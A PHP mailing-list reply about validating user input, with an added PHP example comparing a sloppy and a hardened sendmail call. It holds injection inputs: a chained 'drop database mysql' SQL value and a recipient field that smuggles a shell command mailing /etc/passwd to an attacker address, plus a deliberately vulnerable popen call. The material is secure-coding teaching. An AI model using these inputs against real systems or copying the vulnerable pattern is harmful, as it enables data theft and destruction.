> >2. Please enter your age: 25; drop database mysql
> >
> >Does this actually work?
> [...]
> >So I decided I had to test this: I wrote the code exactly as in the
> >example; I provided the exact dangerous input (well, to be honest, I
> >tried a select instead of drop mysql). When I tried it, the presumably
> >dangerous situation degraded into a trivial MySQL error. It went
> >something like "You have an error near '; select 1+1'".
>
> I've done something similar in the past just for kicks, and I got the same
> result you did (i.e. an error).  I believe this is because mysql_query()
> expects ONE query at a time and will break if you send two or more.  I
> could be completely and totally wrong about that, though (someone please
> correct me if I am)...

Maybe this one failed, but it's always a good idea to check user input.
Let's say you're emailing a form and you don't use the mail() function,
but make a call directly to sendmail... and you're sloppy... so you do
this:

$fp = popen("/usr/bin/sendmail $sendto", "w");  # $sendto goes straight into the shell command line, unchecked
# write stuff to the pipe to send the email...


Now... what if when I filled out the form I set $sendto equal to this:

[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd

Your form will still work, but I'll also get your password file...  This
used to happen *a lot* back in the early CGI days...

This is why they recommend checking all user input and initializing
variables...

-philip
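An added example (not part of the original mail or of any PHP project code) that puts the sloppy sendmail call next to a hardened one and feeds both a constructed recipient of the shape shown above. It assumes a sendmail binary at /usr/bin/sendmail; the demo only builds the command strings, and the checked path rejects the bad input before anything is spawned.

```php
<?php
// Sloppy version: $sendto lands in the shell command line unchanged, so a value
// containing "; /usr/bin/mail ... < /etc/passwd" becomes a second shell command.
function sloppy_command(string $sendto): string {
    return "/usr/bin/sendmail $sendto";
}

// Hardened version: validate the recipient first, then quote it for the shell anyway.
function checked_command(string $sendto): string {
    // Reject anything that is not a single syntactically valid address.
    if (filter_var($sendto, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException("rejected recipient: $sendto");
    }
    // A leading '-' would be read by sendmail as an option even when quoted.
    if ($sendto[0] === '-') {
        throw new InvalidArgumentException("recipient looks like an option: $sendto");
    }
    // escapeshellarg() wraps the value in single quotes, so ; | < > are plain text.
    return "/usr/bin/sendmail " . escapeshellarg($sendto);
}

// Only ever runs the validated, quoted command (assumes /usr/bin/sendmail exists).
function send_checked(string $sendto, string $body): bool {
    $fp = popen(checked_command($sendto), "w");
    if ($fp === false) {
        return false;
    }
    fwrite($fp, $body);
    return pclose($fp) === 0;
}

// Constructed input, same shape as the one in the mail above (addresses are made up).
$evil = 'victim@example.com; /usr/bin/mail attacker@example.com < /etc/passwd';

echo "sloppy:  " . sloppy_command($evil) . "\n";
try {
    echo "checked: " . checked_command($evil) . "\n";
} catch (InvalidArgumentException $e) {
    echo "checked: " . $e->getMessage() . "\n";
}

// A legitimate address passes validation and is still quoted for the shell.
echo "checked: " . checked_command('alice@example.com') . "\n";
```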

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]